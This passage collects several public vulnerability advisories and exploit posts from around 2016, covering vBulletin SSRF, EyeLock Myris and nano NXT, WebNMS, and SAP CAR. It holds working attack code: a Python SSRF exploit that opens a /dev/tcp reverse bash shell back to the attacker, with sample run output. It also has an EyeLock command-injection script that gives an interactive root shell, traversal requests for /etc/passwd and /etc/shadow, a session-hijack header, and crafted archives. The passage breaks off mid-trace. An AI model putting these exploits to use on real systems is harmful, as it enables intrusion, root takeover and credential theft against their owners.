
By specifying a link to a malicious server that returns a 301 HTTP redirect to 
the URL of http://localhost:3306 for example, an attacker could easily 
bypass the restrictions presented above and make a connection to mysql/3306 
service listening on the localhost.

This introduces a Server Side Request Forgery (SSRF) vulnerability.

As curl is used to fetch remote resources, in addition to HTTP, attackers could 
specify a handful of other protocols to interact with local services. 
For instance, by sending a redirect to  gopher://localhost:11211/datahere
attackers could send arbitrary traffic to memcached service on 11211 port.

Additionally, depending on the temporary directory location configured within
the forum, attackers could potentially view the service responses as the 
download function stores responses within temporary files which could be 
viewed if the temporary directory is exposed on the web server.


V. PROOF OF CONCEPT EXPLOIT
-------------------------

The exploit code below performs a port scan as well as demonstrates remote 
command execution via a popular Zabbix Agent monitoring service which might be
listening on local port of 10050.
The exploit will execute a reverse bash shell on the target if it has the agent 
installed and permits remote commands.

The exploit was verified on the following zabbix agent configuration 
(/etc/zabbix/zabbix_agentd.conf):

Server=127.0.0.1,::1
EnableRemoteCommands=1


------------[ vBulletin_SSRF_exploit.py ]-----------
'''

#!/usr/bin/python

intro = """
vBulletin <= 5.2.2 SSRF PoC Exploit (portscan / zabbix agent RCE)

This PoC exploits an SSRF vulnerability in vBulletin to scan internal services
installed on the web server that is hosting the vBulletin forum.

After the scan, the exploit also checks for a Zabbix Agent (10050) port and
gives an option to execute a reverse shell (Remote Commands) that will connect
back to the attacker's host on port 8080 by default. 

Coded by:

 Dawid Golunski
 http://legalhackers.com
"""
usage = """
Usage:
The exploit requires that you have an external IP and can start a listener on port 80/443
on the attacking machine.

./vBulletin_SSRF_exploit.py our_external_IP vBulletin_base_url [minimum_port] [maximum_port]

Example invocation that starts listener on 192.168.1.40 (port 80) and scans local ports 1-85
on the remote vBulletin target host:

./vBulletin_SSRF_exploit.py 192.168.1.40 http://vbulletin-target/forum 1 85

Before exploiting Zabbix Agent, start your netcat listener on 8080 port in a separate shell e.g:

nc -vv -l -p 8080

Disclaimer:
For testing purposes only. Do no harm.

SSL/TLS support needs some tuning. For better results, provide HTTP URL to the vBulletin target.
"""

import web # http://webpy.org/installation
import threading
import time
import urllib
import urllib2
import socket
import ssl
import sys


# The listener that will send redirects to the targe
class RedirectServer(threading.Thread):
    def run (self):
        urls = ('/([0-9a-z_]+)', 'do_local_redir')
        app = web.application(urls, globals())
        #app.run()
	return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', our_port))

class do_local_redir:
    def GET(self,whereto):
	if whereto == "zabbixcmd_redir":
		# code exec
		# redirect to gopher://localhost:10050/1system.run[(/bin/bash -c 'nohup bash -i >/dev/tcp/our_ip/shell_port 0<&1 2>&1 &')  ; sleep 2s]
		return web.HTTPError('301', {'Location': 'gopher://localhost:10050/1system.run%5b(%2Fbin%2Fbash%20-c%20%27nohup%20bash%20-i%20%3E%2Fdev%2Ftcp%2F'+our_ext_ip+'%2F'+str(shell_port)+'%200%3C%261%202%3E%261%20%26%27) %20%3B%20sleep%202s%5d' } )
	else:
		# internal port connection
		return web.HTTPError('301', {'Location': "telnet://localhost:%s/" % whereto} )

def shutdown(code):
	print "\nJob done. Exiting"
	if redirector_started == 1:
		web.httpserver.server.interrupt = KeyboardInterrupt()
	exit(code)


# [ Default settings ]

# reverse shell will connect back to port defined below
shell_port = 8080
# Our HTTP redirector/server port (must be 80 or 443 for vBulletin to accept it)
our_port = 443
# How long to wait (seconds) before considering a port to be opened. 
# Don't set it too high to avoid service timeout and an incorrect close state
connect_time = 2
# Default port scan range is limited to 20-90 to speed up things when testing,
# feel free to increase maxport to 65535 here or on the command line if you've
# got the time ;)
minport = 20
maxport = 90
# ignore invalid certs (enable if target forum is HTTPS)
#ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)


# [ Main Meat ]

print intro
redirector_started = 0

if len(sys.argv) < 3 :
   print usage
   sys.exit(2)

# Set our HTTP Listener/Redirector's external IP
our_ext_ip = sys.argv[1]
try:
    socket.inet_aton(our_ext_ip)
except socket.error:
    print "Invalid HTTP redirector server IP [%s]!\n" % our_ext_ip
    exit(2)

our_server = "http://%s:%s" % (our_ext_ip, our_port)

# Target forum base URL (e.g. http://vulnerable-vbulletin/forum)
targetforum = sys.argv[2]
# Append vulnerable media upload script path to the base URL
targeturl =  targetforum.strip('/') + "/link/getlinkdata"

# Change port range (if provided)
if (len(sys.argv) == 5) :
	minport = int(sys.argv[3])
# Finish scanning at maxport
	maxport = int(sys.argv[4])


# Confirm data
print "\n* Confirm your settings\n"
print "Redirect server to listen on: %s:%s\nTarget vBulletin URL: %s\nScan ports between: %d - %d\n" % (our_ext_ip, our_port, targeturl, minport, maxport)
key = raw_input("Are these settings correct? Hit enter to start the port scan... ")

# Connection check
print "\n* Testing connection to vulnerable script at [%s]\n" % targeturl
req = urllib2.Request(targeturl, data=' ', headers={ 'User-Agent': 'Mozilla/5.0' } )
try:
	response = urllib2.urlopen(req, timeout=connect_time).read()
except urllib2.URLError as e:
        print "Invalid forum URI / HTTP request failed (reason: %s)\n" % e.reason
	shutdown(2)

# Server should return 'invalid_url' string if not url provided in POST
if "invalid_url" not in response:
	print """Invalid target url (%s) or restricted access.\n
              \nTest with:\n curl -X POST -v %s\nShutting down\n""" % (targeturl, targeturl)
	sys.exit(2)
else:
	print "Got the right response from the URL. The target looks vulnerable!\n" 

# [ Start the listener and perform a port scan ]
print "Let's begin!\n"
print "* Starting our redirect base server on %s:%s \n" % (our_ext_ip, our_port)
RedirectServer().start()
redirector_started = 1

print "* Scanning local ports from %d to %d on [%s] target \n" % (minport, maxport, targetforum)
start = time.time()
opened_ports = []
maxport+=1

for targetport in range(minport, maxport):
        #print "\n\nScanning port %d\n" % (targetport)
	fetchurl =  '%s/%d' % (our_server, targetport)
	data = urllib.urlencode({'url' : fetchurl})
	req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } )
	try:
	    response = urllib2.urlopen(req,  timeout=connect_time)
	except urllib2.URLError, e:
	    print "Oops, url issue? 403 , 404 etc.\n"
	except socket.timeout, ssl.SSLError:
	    print "Conection opened for %d seconds. Port %d is opened!\n" % (connect_time, targetport)
	    opened_ports.append(targetport)

elapsed = (time.time() - start)
print "\nScanning done in %d seconds. \n\n* Opened ports on the target [%s]: \n" % (elapsed, targetforum)
for listening in opened_ports:
	print "Port %d : Opened\n" % listening
print "\nAnything juicy? :)\n"

if 10050 in opened_ports:
	print "* Zabbix Agent was found on port 10050 !\n"

# [ Command execution via Zabbix Agent to gain a reverse shell ]
key = raw_input("Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] ")
if key != 'y' :
	shutdown(0)

print "\n* Executing reverse shell via Zabbix Agent (10050)."
fetchurl =  '%s/%s' % (our_server, 'zabbixcmd_redir')
data = urllib.urlencode({'url' : fetchurl})
req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } )
payload_executed = 0
try:
    response = urllib2.urlopen(req,  timeout=connect_time)
except urllib2.URLError, e:
    print "Oops, url issue? 403 , 404 etc.\n"
except socket.timeout, ssl.SSLError:
    # Agent connection remained opened for 2 seconds after the bash payload was sent, 
    # it looks like the sleep 2s shell command must have got executed sucessfuly
    payload_executed = 1

if (payload_executed == 1) :
        print "\nLooks like Zabbix Agent executed our bash payload! Check your netcat listening on port %d for shell! :)\n" % shell_port
else:
        print "\nNo luck. No Zabbix Agent listening on 10050 port or remote commands are disabled :(\n"

shutdown(0)

'''
----------------------[ eof ]------------------------


Example run:

root@trusty:~/vbexploit# ./vBulletin_SSRF_exploit.py 192.168.57.10 http://192.168.57.10/vBulletin522new/ 20 85

vBulletin <= 5.2.2 SSRF PoC Exploit (Localhost Portscan / Zabbix Agent RCE)

This PoC exploits an SSRF vulnerability in vBulletin to scan internal services
installed on the web server that is hosting the vBulletin forum.

After the scan, the exploit also checks for a Zabbix Agent (10050) port and
gives an option to execute a reverse shell (Remote Commands) that will connect
back to the attacker's host on port 8080 by default. 

Coded by:

 Dawid Golunski
 http://legalhackers.com


* Confirm your settings

Redirect server to listen on: 192.168.57.10:443
Target vBulletin URL: http://192.168.57.10/vBulletin522new/link/getlinkdata
Scan ports between: 20 - 85

Are these settings correct? Hit enter to start the port scan... 

* Testing connection to vulnerable script at [http://192.168.57.10/vBulletin522new/link/getlinkdata]

Got the right response from the URL. The target looks vulnerable!

Let's begin!

* Starting our redirect base server on 192.168.57.10:443 

* Scanning local ports from 20 to 85 on [http://192.168.57.10/vBulletin522new/] target 

http://0.0.0.0:443/
192.168.57.10:58675 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /20" - 301
192.168.57.10:58679 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /21" - 301
192.168.57.10:58683 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /22" - 301
Conection opened for 2 seconds. Port 22 is opened!

192.168.57.10:58686 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /23" - 301
192.168.57.10:58690 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /24" - 301
192.168.57.10:58694 - - [30/Jul/2016 03:00:28] "HTTP/1.1 GET /25" - 301
Conection opened for 2 seconds. Port 25 is opened!

192.168.57.10:58697 - - [30/Jul/2016 03:00:30] "HTTP/1.1 GET /26" - 301
[...]
192.168.57.10:58909 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /79" - 301
192.168.57.10:58913 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /80" - 301
Conection opened for 2 seconds. Port 80 is opened!

192.168.57.10:58917 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /81" - 301
192.168.57.10:58921 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /82" - 301
192.168.57.10:58925 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /83" - 301
192.168.57.10:58929 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /84" - 301
192.168.57.10:58933 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /85" - 301

Scanning done in 14 seconds. 

* Opened ports on the target [http://192.168.57.10/vBulletin522new/]: 

Port 22 : Opened

Port 25 : Opened

Port 80 : Opened


Anything juicy? :)

Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] y

* Executing reverse shell via Zabbix Agent (10050).
192.168.57.10:58940 - - [30/Jul/2016 03:00:45] "HTTP/1.1 GET /zabbixcmd_redir" - 301

Looks like Zabbix Agent executed our bash payload! Check your netcat listening on port 8080 for shell! :)


Job done. Exiting


Here is how the netcat session looks like after a sucessful exploitation:

$ nc -vvv -l -p 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [192.168.57.10] port 8080 [tcp/*] accepted (family 2, sport 54259)

zabbix@trusty:/$ id
id
uid=122(zabbix) gid=129(zabbix) groups=129(zabbix)
zabbix@trusty:/$ 



As we can see reverse shell was executed on the target which sucessfully
connected back to the attacker's netcat listener.

VI. BUSINESS IMPACT
-------------------------

The vulnerability can expose internal services running on the server/within 
the local network. 
If not patched, unauthenticated attackers or automated scanners searching for
vulnerable servers could send malicious data to internal services.
Depending on services in use, the impact could range from sensitive information
disclosure, sending spam, DoS/data loss to code execution as demonstrated by 
the PoC exploit in this advisory.

 
VII. SYSTEMS AFFECTED
-------------------------

All vBulletin forums in all branches (5.x, 4.x , 3.x) without the latest patches
named in the next section are affected by this vulnerability. 

 
VIII. SOLUTION
-------------------------

Upon this advisory, vendor has published the following security releases of
vBulletin for each of the affected branches:


 vBulletin 5.2.3

 vBulletin 4.2.4 Beta

 vBulletin 3.8.10 Beta


Separate patches have also been released (see references below).
 
IX. REFERENCES
-------------------------

http://legalhackers.com

http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6483 

vBulletin patches:

http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349551-security-patch-vbulletin-5-2-0-5-2-1-5-2-2

http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349549-security-patch-vbulletin-4-2-2-4-2-3-4-2-4-beta

http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349548-security-patch-vbulletin-3-8-7-3-8-8-3-8-9-3-8-10-beta

X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski

dawid (at) legalhackers (dot) com
http://legalhackers.com
 
XI. REVISION HISTORY
-------------------------

05.08.2016 - final advisory released
 
XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''
HireHackking 
EyeLock Myris 3.3.2 SDK Service Unquoted Service Path Privilege Escalation


Vendor: EyeLock, LLC
Product web page: http://www.eyelock.com
Affected version: 3.3.21289.1311

Summary: myris® provides unparalleled security, is portable, lightweight
and is as easy as looking in a mirror. Use myris to quickly and easily
enroll users for EyeLock’s access control products or to grant users
access to corporate domain environments within seconds—users never have
to type their username and password again.

Desc: The application suffers from an unquoted search path issue impacting
the service 'MyrisService' for Windows deployed as part of Myris solution.
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system. A successful
attempt would require the local user to be able to insert their code in the
system root path undetected by the OS or other security applications where
it could potentially be executed during application startup or reboot. If
successful, the local user’s code would execute with the elevated privileges
of the application.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5355
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5355.php


10.06.2016

--


C:\Users\joxy>sc qc MyrisService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MyrisService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Eyelock Corporation\MyrisSDK\bin\MyrisService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Myris SDK Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
HireHackking 
EyeLock nano NXT 3.5 Local File Disclosure Vulnerability


Vendor: EyeLock, LLC
Product web page: http://www.eyelock.com
Affected version: NXT Firmware: 3.05.1193 (ICM: 3.5.1)
                  NXT Firmware: 3.04.1108 (ICM: 3.4.13)
                  NXT Firmware: 3.03.944  (ICM: 3.3.2)
                  NXT Firmware: 3.01.646  (ICM: 3.1.13)

Platform: Hardware (Biometric Iris Reader (master))

Summary: Nano NXT is the most advanced compact iris-based identity authentication device
in Eyelock's comprehensive suite of end-to-end identity authentication solutions.
Nano NXT is a miniaturized iris-based recognition system capable of providing
real-time identification, both in-motion and at a distance. The Nano NXT is an
ideal replacement for card-based systems, and seamlessly controls access to turnstiles,
secured entrances, server rooms and any other physical space. Similarly the device
is powerful and compact enough to secure high-value transactions, critical databases,
network workstations or any other information system.

Desc: nano NXT suffers from a file disclosure vulnerability when input passed thru the
'path' parameter to 'logdownload.php' script is not properly verified before being used
to read files. This can be exploited to disclose contents of files from local resources.

==================================================================================
/scripts/logdownload.php:
-------------------------
1: <?php 
2:    header("Content-Type: application/octet-stream");
3:    header("Content-Disposition: attachment; filename={$_GET['dlfilename']}");
4:    readfile($_GET['path']);
5: ?>
==================================================================================

Tested on: GNU/Linux (armv7l)
           lighttpd/1.4.35
           SQLite/3.8.7.2
           PHP/5.6.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                             @zeroscience


Advisory ID: ZSL-2016-5356
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5356.php


10.06.2016

--


http://192.168.40.1/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd
HireHackking 
#!/usr/bin/env python
#
#
# EyeLock nano NXT 3.5 Remote Root Exploit
#
#
# Vendor: EyeLock, LLC
# Product web page: http://www.eyelock.com
# Affected version: NXT Firmware: 3.05.1193 (ICM: 3.5.1)
#                   NXT Firmware: 3.04.1108 (ICM: 3.4.13)
#                   NXT Firmware: 3.03.944  (ICM: 3.3.2)
#                   NXT Firmware: 3.01.646  (ICM: 3.1.13)
#
# Platform: Hardware (Biometric Iris Reader (master))
#
# EyeLock is an advanced iris authentication and recognition solutions company
# focused on developing next-generation systems for global access control and identity
# management.
#
# Summary: nano NXT® - the next generation of EyeLock’s revolutionary access
# control solutions. nano NXT renders all other access control peripherals
# obsolete by revolutionizing how identities are protected, authenticated,
# and managed. With a sleek low profile and powerful capabilities, the nano
# NXT redefines the future of access control. An optional SDK is available
# to customers who want to customize their security solutions to integrate
# seamlessly with existing applications. The nano NXT authenticates up to 20
# people per minute, in-motion and at-a-distance with unparalleled accuracy.
# nano NXT can be used in a variety of environments including commercial/enterprise,
# corrections, data centers, education, financial services, government, healthcare
# facilities and hospitality.
#
# Nano NXT is the most advanced compact iris-based identity authentication device
# in Eyelock's comprehensive suite of end-to-end identity authentication solutions.
# Nano NXT is a miniaturized iris-based recognition system capable of providing
# real-time identification, both in-motion and at a distance. The Nano NXT is an
# ideal replacement for card-based systems, and seamlessly controls access to turnstiles,
# secured entrances, server rooms and any other physical space. Similarly the device
# is powerful and compact enough to secure high-value transactions, critical databases,
# network workstations or any other information system.
#
# Desc: EyeLock's nano NXT firmware latest version 3.5 (released 25.07.2016) suffers
# from multiple unauthenticated command injection vulnerabilities. The issue lies
# within the 'rpc.php' script located in the '/scripts' directory and can be triggered
# when user supplied input is not correctly sanitized while updating the local time for
# the device and/or get info from remote time server. The vulnerable script has two REQUEST
# parameters 'timeserver' and 'localtime' that are called within a shell_exec() function
# for setting the local time and the hardware clock of the device. An attacker can exploit
# these conditions gaining full system (root) access and execute OS commands on the affected
# device by injecting special characters to the affected parameters and further bypass
# the access control in place.
#
# Hint: Plenty other RCE bugs are present in the rpc.php and others (like: uploadCertificate.php,
# upgrade.php, WebConfig.php, firmwareupdate.php, interfaceeditor.php, etc.)
#
# =============================================================================
# /scripts/rpc.php:
# -----------------
# 9:  if (isset($_REQUEST['action']))
# 10: {
# 11:    switch($_REQUEST['action'])
# ...
# ...
# 181:        case 'updatetime':
# 182:        {
# 183:            // do something, the put our response in the response field...
# 184:            $strDate = shell_exec("rdate -s {$_REQUEST['timeserver']} 2>&1");
# 185:
# 186:            // set the hardware clock.
# 187:            $strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure...
# 188:
# 189:            $strtheDate = shell_exec("date 2>&1");
# 190:
# 191:            echo "updatetime|{$strDate}|{$strtheDate}";
# 192:
# 193:            break;
# 194:        }
# 195:
# 196:        case 'updatelocaltime':
# 197:        {
# 198:            // do something, the put our response in the response field...
# 199:            $strDate = shell_exec("date -s '{$_REQUEST['localtime']}' 2>&1");
# 200:
# 201:            // set the hardware clock
# 202:            $strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure...
# 203:
# 204:            $strtheDate = shell_exec("date 2>&1");
# 205:
# 206:            echo "updatelocaltime|{$strDate}|{$strtheDate}";
# 207:
# 208:            break;
# 209:        }
# =============================================================================
#
# -----------------------------------------------------------------------------
# Master: 192.168.40.1
# Slave:  192.168.40.2
#
# $ eyelock.py 192.168.40.1
#
# root@192.168.40.1:~# id
# uid=0(root) gid=0(root)
#
# root@192.168.40.1:~# cat /home/root/knockd.conf
# [options]
#	logfile = /var/log/knockd.log
#
# [openSSH]
#	sequence    = 1973,1975,2013
#	seq_timeout = 15
#	command     = /usr/sbin/iptables -D INPUT -p tcp --dport 22 -j DROP
#	tcpflags    = syn
#
# [closeSSH]
#	sequence    = 91,85,70
#	seq_timeout = 5
#	command     = /usr/sbin/iptables -A INPUT -p tcp --dport 22 -j DROP
#	tcpflags    = syn
#
#
# root@192.168.40.1:~# exit
#
# $
# -----------------------------------------------------------------------------
#
#
# Tested on: GNU/Linux (armv7l)
#            lighttpd/1.4.35
#            SQLite/3.8.7.2
#            PHP/5.6.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2016-5357
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5357.php
#
#
# 10.06.2016
#

import re,sys,os
import requests

piton = os.path.basename(sys.argv[0])

print '''
---------------------------------------------------------
EyeLock nano NXT <=3.5 [Open Sesame] Remote Root Exploit

         Zero Science Lab - http://zeroscience.mk
                      ZSL-2016-5357

---------------------------------------------------------
'''

if len(sys.argv) < 2:
	print '\n\x20\x20[*] Usage: '+piton+' <ipaddress>\n'
	sys.exit()

ipaddr = sys.argv[1]

print
while True:
	try:
		cmd = raw_input('root@'+ipaddr+':~# ')
		# http://EyelockNxtMasterIP/scripts/rpc.php?action=updatelocaltime&localtime=%26whoami%26
		execute = requests.get('http://'+ipaddr+'/scripts/rpc.php?action=updatetime&timeserver=||'+cmd)
		pattern = re.compile(r'updatetime\|(.*?)\|',re.S|re.M)
		cmdout = pattern.match(execute.text)
		print cmdout.groups()[0].strip()
		print
		if cmd.strip() == 'exit':
			break
	except Exception:
		break

sys.exit()
HireHackking 
>> Multiple vulnerabilities in WebNMS Framework Server 5.2 and 5.2 SP1
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 04/07/2016 / Last updated: 08/08/2016

>> Background on the affected product:
"WebNMS is an industry-leading framework for building network management applications. With over 25,000 deployments worldwide and in every Tier 1 Carrier, network equipment providers and service providers can customize, extend and rebrand WebNMS as a comprehensive Element Management System (EMS) or Network Management System (NMS).
NOC Operators, Architects and Developers can customize the functional modules to fit their domain and network. Functional modules include Fault Correlation, Performance KPIs, Device Configuration, Service Provisioning and Security. WebNMS supports numerous Operating Systems, Application Servers, and databases."


>> Summary:
WebNMS contains three critical vulnerabilities that can be exploited by an unauthenticated attacker: one directory traversal that can be used to achieve remote code execution, another directory traversal that can be abused to download any text file in the system and the possibility to impersonate any user in the system. In addition, WebNMS also stores the user passwords in a file with a weak obfuscation algorithm that can be easily reversed.

A special thanks to the SecuriTeam Secure Disclosure programme (SSD), which performed the disclosure in a responsible manner to the affected vendor. This advisory can be seen in their blog at https://blogs.securiteam.com/index.php/archives/2712

Metasploit exploits for all vulnerabilities have also been released.


>> Technical details:
#1
Vulnerability: Directory traversal in file upload functionality (leading to remote code execution)
CVE-2016-6600
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. See below for other constraints.
Affected versions: unknown, at least 5.2 and 5.2 SP1

The FileUploadServlet has a directory traversal vulnerability, that allows an unauthenticated attacker to upload a JSP file that executes on the server. 
To exploit this vulnerability, simply POST as per the proof of concept below. The directory traversal is in the "fileName" parameter.

POST /servlets/FileUploadServlet?fileName=../jsp/Login.jsp HTTP/1.1
<JSP payload here>

There are two things to keep in mind for the upload to be successful:
- Only text files can be uploaded, binary files will be mangled.
- In order to achieve code execution without authentication, the files need to be dropped in ../jsp/ but they can only have the following names: either Login.jsp or a WebStartXXX.jsp, where XXX is any string of any length.


#2
Vulnerability: Directory traversal in file download functionality
CVE-2016-6601
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. Only text files can be downloaded properly, any binary file will get mangled by the servlet and downloaded incorrectly.
Affected versions: unknown, at least 5.2 and 5.2 SP1

The FetchFile servlet has a directory traversal vulnerability that can be abused by an unauthenticated attacker to download arbitrary files from the WebNMS host. The vulnerable parameter is "fileName" and a proof of concept is shown below.

GET /servlets/FetchFile?fileName=../../../etc/shadow


#3
Vulnerability: Weak obfuscation algorithm used to store passwords
CVE-2016-6602
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker.
Affected versions: unknown, at least 5.2 and 5.2 SP1

The ./conf/securitydbData.xml file (in the WebNMS WEB-INF directory) contains entries with all the usernames and passwords in the server:
<DATA ownername="NULL" password="e8c89O1f" username="guest"/>
<DATA ownername="NULL" password="d7963B4t" username="root"/>

The algorithm used to obfuscate is convoluted but easy to reverse engineer. The passwords above are "guest" for the "guest" user and "admin" for the "root" user. A Metasploit module implementing the deobfuscation algorithm has been released.

This vulnerability can be combined with #2 and allow an unauthenticated attacker to obtain credentials for all user accounts:
GET /servlets/FetchFile?fileName=conf/securitydbData.xml 


#4
Vulnerability: User account impersonation / hijacking
CVE-2016-6603
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker.
Affected versions: unknown, at least 5.2 and 5.2 SP1

It is possible to impersonate any user in WebNMS by simply setting the "UserName" HTTP header when making a request, which will return a valid authenticated session cookie. This allows an unauthenticated attacker to impersonate the superuser ("root") and perform administrative actions. The proof of concept is shown below:

GET /servlets/GetChallengeServlet HTTP/1.1
UserName: root

This returns the cookie "SessionId=0033C8CFFE37EB6093849CBA4BF2CAF3;" which is a valid, JSESSIONID cookie authenticated as the "root" user. This can then be used to login to the WebNMS Framework Server by simply setting the cookie and browsing to any page.


>> Fix:
Since the vendor did not respond to any contacts attempted by Beyond Security and its SSD programme, it is not known whether a fixed version of WebNMS Framework Server has been released. It is highly recommended not to expose the server to any untrusted networks (such as the Internet).


================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
HireHackking 
1. Advisory Information

Title: SAP CAR Multiple Vulnerabilities
Advisory ID: CORE-2016-0006
Advisory URL: http://www.coresecurity.com/advisories/sap-car-multiple-vulnerabilities
Date published: 2016-08-09
Date of last update: 2016-08-09
Vendors contacted: SAP
Release mode: Coordinated release

2. Vulnerability Information

Class: Unchecked Return Value [CWE-252], TOCTOU Race Condition [CWE-367]
Impact: Denial of service, Security bypass
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2016-5845, CVE-2016-5847

3. Vulnerability Description

SAP [1] distributes software and packages using an archive program called SAPCAR. This program uses a custom archive file format. Vulnerabilities were found in the extraction of specially crafted archive files, that could lead to local denial of service conditions or privilege escalation.

4. Vulnerable Packages

SAPCAR archive tool
Other products and versions might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

SAP published the following Security Notes:

2312905
2327384

6. Credits

This vulnerability was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.

7. Technical Description / Proof of Concept Code

SAP distributes software and packages using an archive program called SAPCAR. This program uses a custom archive file format. Vulnerabilities were found in the extraction of specially crafted archive files, that could lead to denial of service conditions or escalation of privileges.

The code that handles the extraction of archive files is prone to privilege escalation and denial of service vulnerabilities.

7.1. Denial of service via invalid file names

[CVE-2016-5845] Denial of service vulnerability due the SAPCAR program not checking the return value of file operations when extracting files. This might result in the program crashing when trying to extract files from an specially crafted archive file that contains invalid file names for the target platform. Of special interest are applications or solutions that makes use of SAPCAR in an automated way.

The following is a proof of concept to demonstrate the vulnerability:

 
        $ xxd SAPCAR_crash.SAR 
        0000000: 4341 5220 322e 3031 4452 0081 0000 0f00  CAR 2.01DR......
        0000010: 0000 0000 0000 0000 0000 d4f8 e555 0000  .............U..
        0000020: 0000 0000 0000 0000 1000 696e 7075 742d  ..........input-
        0000030: 6469 722f 696e 7090 7400 4544 1a00 0000  dir/inp.t.ED....
        0000040: 0f00 0000 121f 9d02 7bc1 23b9 a90a 25a9  ........{.#...%.
        0000050: 1525 0a69 9939 a95c 0000 857f b95a       .%.i.9.\.....Z
        
        $ ./SAPCAR -dvf SAPCAR_crash.SAR
        SAPCAR: processing archive SAPCAR_crash.SAR (version 2.01)
        d input-dir/inp#t
        SAPCAR: checksum error in input-dir/inp#t (error 12). No such file or director
        
        $ ./SAPCAR -xvf SAPCAR_crash.SAR
        SAPCAR: processing archive SAPCAR_crash.SAR (version 2.01)
        x input-dir/inp#t
        Segmentation fault
 
7.2. Race condition on permission change

[CVE-2016-5847] Race condition vulnerability due to the way the SAPCAR program change the permissions of extracted files. If a malicious local user has access to a directory where a user is extracting files using SAPCAR, the attacker might use this vulnerability to change the permissions of arbitrary files belonging to the user.

The SAPCAR program writes the file being extracted and after closing it, the program changes the permissions to the ones set on the archive file. There's a time gap between the creating of the file and the change of the permissions. During this time frame, a malicious local user can replace the extracted file with a hard link to a file belonging to another user, resulting in the SAPCAR program changing the permissions on the hard-linked file to be the same as that of the compressed file.

The following is a proof of concept to demonstrate the vulnerability:

 
      $ xxd SAPCAR_race_condition.SAR
      0000000: 4341 5220 322e 3031 5247 b481 0000 2b00  CAR 2.01RG....+.
      0000010: 0000 0000 0000 0000 0000 d023 5e56 0000  ...........#^V..
      0000020: 0000 0000 0000 0000 1000 7465 7374 5f73  ..........test_s
      0000030: 7472 696e 672e 7478 7400 4544 3500 0000  tring.txt.ED5...
      0000040: 2b00 0000 121f 9d02 7b21 19a9 0a85 a599  +.......{!......
      0000050: c9d9 0a49 45f9 e579 0a69 f915 0a59 a5b9  ...IE..y.i...Y..
      0000060: 05c5 0af9 65a9 450a 2540 e99c c4aa 4a85  ....e.E.%@....J.
      0000070: 94fc 7400 0008 08c6 b9                   ..t......
      
      $ ./SAPCAR -tvf SAPCAR_race_condition.SAR 
      SAPCAR: processing archive SAPCAR_race_condition.SAR (version 2.01)
      -rw-rw-r--          43    01 Dec 2015 19:48 test_string.txt
      
      $ strace ./SAPCAR -xvf SAPCAR_race_condition.SAR 
      execve("./SAPCAR", ["./SAPCAR", "-xvf", "SAPCAR_race_condition.SAR"], [/* 76 vars */]) = 0
      [..]
      open("test_string.txt", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
      mmap(NULL, 323584, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f98c4704000
      fstat(4, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
